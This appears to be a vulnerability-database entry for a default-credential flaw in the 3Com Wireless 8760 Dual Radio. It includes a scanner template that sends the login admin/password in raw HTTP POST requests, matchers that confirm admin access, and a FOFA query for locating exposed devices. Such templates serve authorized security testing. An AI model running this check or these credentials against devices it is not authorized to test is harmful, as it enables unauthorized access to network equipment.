3Com-wireless-default-login: 3Com Wireless 8760 Dual Radio - Default Login

Date: 2025-08-01 | Affected software: 3Com Wireless 8760 Dual Radio | PoC: public

Vulnerability description

The 3Com Wireless 8760 Dual Radio contains a default login vulnerability: the admin login still uses the default password 'password'.

PoC code [public]

id: 3Com-wireless-default-login

info:
  name: 3Com Wireless 8760 Dual Radio - Default Login
  author: ritikchaddha
  severity: high
  description: |
    3COM Wireless 8760 Dual Radio contains a default login vulnerability. Default admin login password 'password' was found.
  reference:
    - https://www.speedguide.net/routers/3com-wl-546-3com-wireless-8760-dual-radio-11abg-1256
  metadata:
    max-request: 2
    fofa-query: "title=\"3COM\""
  tags: default-login,3com,vuln

http:
  - raw:
      - |
        POST /index.htm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userid={{username}}&passwd={{password}}&Submit=LOGIN

      - |
        POST /login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    stop-at-first-match: true
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'alt="Advanced Configuration"'
          - 'image/setup_wizard'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b47ce01af846388be467dd94fd6a312521624bb283b97b1e49e7189323fa4afd022065037c23cd82aabdd7d1a194faa291f5afccea3d35b9ef969619ea3fa1aa801c:922c64590222798bb761d5b6d8e72950